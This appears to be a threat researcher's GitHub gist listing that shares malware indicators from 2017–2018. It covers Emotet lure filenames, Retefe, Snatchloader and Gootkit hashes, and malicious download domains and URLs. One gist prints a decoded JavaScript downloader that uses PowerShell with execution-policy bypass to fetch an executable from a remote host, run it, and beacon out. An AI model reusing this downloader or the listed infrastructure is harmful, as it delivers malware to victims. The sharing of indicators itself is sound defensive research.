Skip to content

Instantly share code, notes, and snippets.

Blevene Blevene

  • PANW
Block or report user

Report or block Blevene

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@Blevene
Blevene / Filenames
Created Nov 28, 2017
Emotet DE Targets: 11/28/2017
View Filenames
Informationen # 558760280928.doc
Informationen # 8104038723.doc
Invoice #38608290.doc
Invoice #639002322639.doc
Rechnung # 3310283.doc
Rechnung # 640507209.doc
Rechnung # 72120749699.doc
Rechnung # 953444866.doc
Rechnungs-Details # 4168802.doc
Rechnungs-Details # 54430860.doc
@Blevene
Blevene / Retefe Components
Created Nov 29, 2017
Retefe - e2494fc7eda73ac116a9a07aced0bab23efc6d494dd3f024e45f048b339f7860
View Retefe Components
//JS Component
(function(e, r) {
"object" == typeof exports ? module.exports = r() : "function" == typeof define && define.amd ? define(r) : e.RYULJ = r()
})(this, function() {
"use strict";
var e = 14,
r = 8,
n = !1,
f = function(e) {
try {
View Retefe_Hashes_And_HTTP_URIs
host,method,url,user_agent,sha256,
pamplonarecados.com,GET,/pbuxegx.exe,,c9390e9f53c2a05c3cf7b84c1ee80acb8306be64b5e5e5544913ac298a1aa5db,
pamplonarecados.com,GET,/pbuxegx.exe,,05f298006d2bf23b3ebe8bf0e4bf1431602d96f5170efa0e0d983cac0d7f42b6,
pamplonarecados.com,GET,/pbuxegx.exe,,dbcdbe148ba66056fed2349138b849643cb35fd9c8424febfbc473d22418ccf2,
pamplonarecados.com,GET,/pbuxegx.exe,,648bef8d6abd544c17fcc1275a6f84686296ee9001b55bf64a3dc8971cf0f3f9,
pamplonarecados.com,GET,/pbuxegx.exe,,2ab4550f7793e53682499e852f1c043f70eaac909c30ced4d6263bb193db0ddb,
pamplonarecados.com,GET,/pbuxegx.exe,,405ec5019db005dfc205e6bab8820d43073694943396305e923f62afde0197b7,
pamplonarecados.com,GET,/pbuxegx.exe,,f19f50619761c2f712ad26c870eefd62e1a9b054d856909c8b12d04eaf7ec939,
pamplonarecados.com,GET,/pbuxegx.exe,,1125356ffdc01a4964e1504d034b3bbdb6df75fb3848fe2c72e579a7c9458743,
pamplonarecados.com,GET,/pbuxegx.exe,,93a4881c4a3c76e2afbd43b08a7a086bb03ccab717cb82e2ef9a09447624c3b2,
View gist:e601eaa3dc05c4d12b53eaf7b96aeba5
Filename: request.doc
Sha256
84a7ddaad12698d9b5b2f0eef0f17f42b762dac78b77a86a994a66be2f1f1ef5
9d1b9f99302ab34a0b468b52317d208dfc9d91e10ecb1d079d00c3367a9666ce
503b3ba8ae3464e6735d305f5a5fc82479fe5b961d348800d100ec911f90b208
a05c5dd59204fb505c2b4b2911d9cec4bd00337d41caec19dccdeffb58c3d756
c191965ee51c04073d47e4c5b349bf69cf33c083cc641b9f92b293ae9ae2628d
6e6ffedeb7b0e7de8a3e85ed00e8f84e61356935b1b637b4711ae691ce496490
b891b48ad2e98dbb409e4d1f95a40b30635ae528fa7076a5cb76beacaf78da05
View Snatchloader Hashes
d38945a93a926169cbe878afa6b292a5b52c570b61dc096725a0ddb8fdd5209e
0b718516dcd50a092663c9cd6f7774408cdaaf2bf55cddf1be7a69ff83b50228
847e9993ee3dbfd6a1eadb5addf82169ec8a2c8ee45fd4811950fb5a4be849db
b9cde665debef868eb0d8dcb156e57233e0d93bfab3380ed6c9564023ff9c3c5
e2e8dc489df96d8619936c9c7ad366d7639cc9e4229e11cf1804ff8aeffa8d2f
11602f3e29f3ec67e292fb84091e512ade674f5f6b71c970f70145ad16127ffa
fe93335975f3fe88e221e68e89cfb60a1e59b6b9cbde919a8b4676dd12db2934
@Blevene
Blevene / Hahes
Created Dec 14, 2017
".styx" hunt for Demonslay335
View Hahes
5e7d11d6bd11b09c4cc0c4ba54ebea19dcc06ae585d0508d3d8dba251075f4c6
bf01d97d76a6bb8f3cfbf4a697403f4b686d43fabb429a7bf9427aa70371df78
ba9b26cc08591655878f90c3d8c9e346680e80a40a076efa886d18926eae2293
6a637e90e0673ee6090cc4fb47d82ab87ae7d26ffcff7a7dcafd4da167aea8bc
488a8bc75fd39460bf54dcf904c90d67c94fa1bd38b0ee729b527a062f6ddf0e
@Blevene
Blevene / gist:ffc1bee1dd203e3d334f829a41bf05ac
Created Dec 19, 2017
Possible signed Teamviewer Backconnect... thing
View gist:ffc1bee1dd203e3d334f829a41bf05ac
Ref (thanks Matt Mesa): https://vms.drweb.com/virus/?_is=1&i=8161714
7dc273a5328ec74392513bd7cc2849d1dc2bd5c83ff035612503aceb5a12ca72
9f5566b23d96b422921dec14952e64e583789757d7f93c7d453b2f5c5508dc2d
4ee7e9cc367d4cf8bcb568ab14d46a35bbf433b29d8686ee977692ab98bf8a72
48aab1c29b6113cf3cd1544188eccade9ae82e330bfc8803876fe64339425b3a
f2814dc63fc8b79e97046781e3e9efb4b653478802ab91ca45c4f6dd25728c66
06a0029bb4a706f03d1626ad79d919f32cf0529e83aa1d9d24d9a4639ec61d49
3278637ee693d3c9eefb6bc0b62b567f9f5f01a305ca3567d51f5f129a2e4e94
8159394c0ed15bc30b6da648dab3c3dcc5f9a62c830b4e2e98c9d29493b569a9
fa0e3c6c4da0ecc370918999a001276113773fafd0486b65b6a07175b00f2105
@Blevene
Blevene / Retefe Dropper
Created Jan 8, 2018
Retefe Campaign January 8th, 2018
View Retefe Dropper
Binary:
25a923f213098d4878858d4dea40a01262fff3029d5ac24d0f5b064b8999a853
Downloader Locations (From Powershell):
ahkorea.eu
compters.net
concretebirdbathmolds.net
concretemoldcompanies.com
eubieartmedia.com
@Blevene
Blevene / bomberc
Created Mar 2, 2018
Decoded downloader component from d8ecb55b823b87a06eb8fc524baff969974a092385ac09bdb02537202380375c
View bomberc
<script>
var diskomagana = ActiveXObject;
var termianxala = new diskomagana('WScript.Shell');
var lopomeriara = (decodeURIComponent("p o w e r s h e l l")).replace(/ /g,'') + ' -Exec Bypass -NoExit -Command (New-Object System.Net.WebClient).DownloadFile(\'http://jnossidjfnweqrfew.com/NOB/bomberc.class\', $env:APPDATA + \'\\\\fb1b1d10.exe\'); Start-Process $env:APPDATA\'\\\\fb1b1d10.exe\'; (New-Object System.Net.WebClient).DownloadString(\'http://jnossidjfnweqrfew.com/OU/freddie.php?l=bomberc\'); ;'.replace(//g,'');
setTimeout(function(){window.close()},16180);
setTimeout(function(){termianxala.run(lopomeriara,0)})
</script>
@Blevene
Blevene / Gootkit
Created Mar 13, 2018
Gootkit: 3/13/2018
View Gootkit
e4ec1c45173db4a6c9a243c859f21b5a72b43bcdd455e18928292e2682275399
6e5c55c8b6601081fa6fbc4e4cb64b9dba0fdcf2b432c104dfdb7157dd5a7133
d7d4e15c42f830f6e6894dd2fb4ebc8f8df65f492048e67ad7bda1949271fad1
217201028cfad66ea193105e7a7d6bb0a0d9b536d8cf6093bc45c7c328d63ac7
You can’t perform that action at this time.